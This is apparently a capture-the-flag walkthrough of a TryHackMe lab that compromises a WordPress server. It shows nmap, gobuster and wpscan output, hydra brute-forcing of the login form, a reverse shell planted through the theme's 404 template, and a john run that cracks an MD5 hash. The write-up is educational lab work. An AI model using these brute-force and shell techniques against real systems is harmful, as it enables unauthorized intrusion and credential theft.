Categories: walkthrough
Tags: tryhackme, thm, gobuster, wordpress, wpscan, xss-vulnerability, xss, CVE-2019-9887, hydra, john-the-ripper, PrivEsc, Linux-Machine, PrivEsc-Linux, PrivEsc-SUID, SUID, PrivEsc-nmap
$ nmap -p0-65535 -vvv 10.10.131.32 --reason
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-18 08:43 EDT
Initiating Ping Scan at 08:43
Scanning 10.10.131.32 [2 ports]
Completed Ping Scan at 08:43, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:44
Completed Parallel DNS resolution of 1 host. at 08:44, 6.53s elapsed
DNS resolution of 1 IPs took 6.53s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating Connect Scan at 08:44
Scanning 10.10.131.32 [2 ports]
Discovered open port 443/tcp on 10.10.131.32
Discovered open port 80/tcp on 10.10.131.32
Completed Connect Scan at 08:44, 0.16s elapsed (2 total ports)
Nmap scan report for 10.10.131.32
Host is up, received syn-ack (0.16s latency).
Scanned at 2021-07-18 08:43:59 EDT for 7s
PORT STATE SERVICE REASON
80/tcp open http syn-ack
443/tcp open https syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.90 seconds
$ nmap -sV -sC -p80,443 10.10.131.32
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-18 08:47 EDT
Nmap scan report for 10.10.131.32
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.99 seconds
There is nothing much on Home page and its themed shell so, not responding to any commands.
Lets fuzz for directories
$ gobuster dir -u http://10.10.131.32/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.131.32/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/07/18 08:08:05 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 235] [--> http://10.10.131.32/images/]
/blog (Status: 301) [Size: 233] [--> http://10.10.131.32/blog/]
/sitemap (Status: 200) [Size: 0]
/rss (Status: 301) [Size: 0] [--> http://10.10.131.32/feed/]
/login (Status: 302) [Size: 0] [--> http://10.10.131.32/wp-login.php]
/0 (Status: 301) [Size: 0] [--> http://10.10.131.32/0/]
/video (Status: 301) [Size: 234] [--> http://10.10.131.32/video/]
/feed (Status: 301) [Size: 0] [--> http://10.10.131.32/feed/]
/image (Status: 301) [Size: 0] [--> http://10.10.131.32/image/]
/atom (Status: 301) [Size: 0] [--> http://10.10.131.32/feed/atom/]
/wp-content (Status: 301) [Size: 239] [--> http://10.10.131.32/wp-content/]
/admin (Status: 301) [Size: 234] [--> http://10.10.131.32/admin/]
/audio (Status: 301) [Size: 234] [--> http://10.10.131.32/audio/]
/intro (Status: 200) [Size: 516314]
/wp-login (Status: 200) [Size: 2606]
/css (Status: 301) [Size: 232] [--> http://10.10.131.32/css/]
/rss2 (Status: 301) [Size: 0] [--> http://10.10.131.32/feed/]
/license (Status: 200) [Size: 309]
/wp-includes (Status: 301) [Size: 240] [--> http://10.10.131.32/wp-includes/]
/js (Status: 301) [Size: 231] [--> http://10.10.131.32/js/]
/Image (Status: 301) [Size: 0] [--> http://10.10.131.32/Image/]
/rdf (Status: 301) [Size: 0] [--> http://10.10.131.32/feed/rdf/]
/page1 (Status: 301) [Size: 0] [--> http://10.10.131.32/]
/readme (Status: 200) [Size: 64]
/robots (Status: 200) [Size: 41]
/dashboard (Status: 302) [Size: 0] [--> http://10.10.131.32/wp-admin/]
/%20 (Status: 301) [Size: 0] [--> http://10.10.131.32/]
Navigating to the directories obtained in gobuster
we got the first key
fsocity.dic
has some dictionary words.
By navigating to login
directory, we are greeted with wordpress login page
Lets run wpscan for more information
$ wpscan --url http://10.10.131.32
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://10.10.131.32/ [10.10.131.32]
[+] Started: Sun Jul 18 09:30:22 2021
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache
| - X-Mod-Pagespeed: 1.9.32.3-4523
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://10.10.131.32/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.131.32/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] The external WP-Cron seems to be enabled: http://10.10.131.32/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.131.32/254b937.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.131.32/254b937.html, Match: 'WordPress 4.3.1'
[+] WordPress theme in use: twentyfifteen
| Location: http://10.10.131.32/wp-content/themes/twentyfifteen/
| Last Updated: 2021-03-09T00:00:00.000Z
| Readme: http://10.10.131.32/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://10.10.131.32/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.131.32/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:06 <====================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:06
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Jul 18 09:30:37 2021
[+] Requests Done: 183
[+] Cached Requests: 6
[+] Data Sent: 44.111 KB
[+] Data Received: 13.817 MB
[+] Memory used: 212.887 MB
[+] Elapsed time: 00:00:15
Wordpress version is 4.3.1
and using twentyfifteen
them.
Wordpress 4.3.1 has XXS
vulnerability CVE-2019-9887
.This requires already authenticated admin account to work. So its not an option now.
The default username for wordpress is admin
. Lets check with admin:password
as credentials
Its showing invalid username
. so default username is changed
We have a dictionary of words in fsocity.dic
.
Lets bruteforce the username
with fsocity.dic
using hydra
$ hydra -L ./fsocity_sorted.dic -p password 10.10.131.32 http-form-post '/wp-login.php:log=^USER^&pwd=password&wp-submit=Login+In:Invalid username.' -t 30
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-18 10:29:36
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 30 tasks per 1 server, overall 30 tasks, 11452 login tries (l:11452/p:1), ~382 tries per task
[DATA] attacking http-post-form://10.10.131.32:80/wp-login.php:log=^USER^&pwd=password&wp-submit=Login+In:Invalid username.
[80][http-post-form] host: 10.10.131.32 login: Elliot password: password
[80][http-post-form] host: 10.10.131.32 login: elliot password: password
[80][http-post-form] host: 10.10.131.32 login: ELLIOT password: password
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-18 10:37:04
username is case insensitive and we have new warning as the password is incorrect.
Lets find the password for elliot
.
$ hydra -l elliot -P ./fsocity_sorted.dic 10.10.131.32 http-form-post '/wp-login.php:log=elliot&pwd=^PASS^&wp-submit=Login+In:The password you entered' -t 30
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-18 10:46:37
[DATA] max 30 tasks per 1 server, overall 30 tasks, 11452 login tries (l:1/p:11452), ~382 tries per task
[DATA] attacking http-post-form://10.10.131.32:80/wp-login.php:log=elliot&pwd=^PASS^&wp-submit=Login+In:The password you entered
[80][http-post-form] host: 10.10.131.32 login: elliot password: REDACTED
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-18 10:56:46
We are greeted with WP Dashboard by using the credentials obtained.
Lets get the reverse shell from wordpress
By navigating to Dashboard>Apperance>Editor
Edit 404 template
with our revershell code.
By navigating to http://10.10.131.32/wp-content/themes/twentyfifteen/404.php
we got the shell
Spawning TTY
$ date
Sun Jul 18 15:42:11 UTC 2021
$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/$ ^Z
[1] + 8366 suspended nc -nlvp 9898
$ stty raw -echo; fg
[1] + 8366 continued nc -nlvp 9898
daemon@linux:/$ export TERM=xterm
daemon@linux:/$
Getting the 2nd key
Cracking the hash
$ john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt user_robot.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
REDACTED (?)
1g 0:00:00:00 DONE (2021-07-18 11:48) 14.28g/s 581485p/s 581485c/s 581485C/s bonjour1..teletubbies
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
using nmap
for privilege escalation and Getting the 3rd key